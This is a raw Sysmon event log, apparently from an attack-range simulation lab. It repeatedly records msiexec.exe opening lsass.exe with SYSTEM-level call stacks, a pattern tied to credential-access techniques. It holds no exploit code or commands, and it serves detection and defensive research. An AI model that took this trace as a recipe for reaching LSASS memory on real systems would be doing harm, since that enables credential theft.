15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693466Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693465Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693464Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693463Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693462Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693461Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693460Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693459Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693458Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693457Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693456Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693455Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693454Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693453Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693452Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693451Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693450Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693449Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693448Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693447Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693446Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693445Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 